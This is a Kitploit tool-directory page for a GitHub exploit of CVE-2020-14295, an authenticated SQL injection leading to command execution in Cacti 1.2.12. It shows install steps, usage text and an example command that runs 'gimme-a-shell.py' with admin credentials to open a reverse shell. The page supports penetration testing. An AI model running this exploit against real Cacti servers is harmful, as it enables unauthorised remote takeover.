Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-14295 — Authenticated SQL injection to command execution on Cacti 1.2.12 | Kitploit
Tools/GitHubGitHub/0z09e/cve-2020-14295
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHub0z09e/cve-2020-14295

CVE-2020-14295

Authenticated SQL injection to command execution on Cacti 1.2.12

View Repository
2285 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-14295


Vulnerability details - https://github.com/Cacti/cacti/issues/3622

Install

pip3 install -r requirements.txt

Usage

$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port

optional arguments:
  -h, --help     show this help message and exit

required arguments:
  -t Target      Target URL
  -U Username    Cacti username
  -P Password    Cacti password
  -i Shell-IP    Reverse-Shell IP
  -p Shell-Port  Reverse-Shell Port

Example

./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001

Download Tool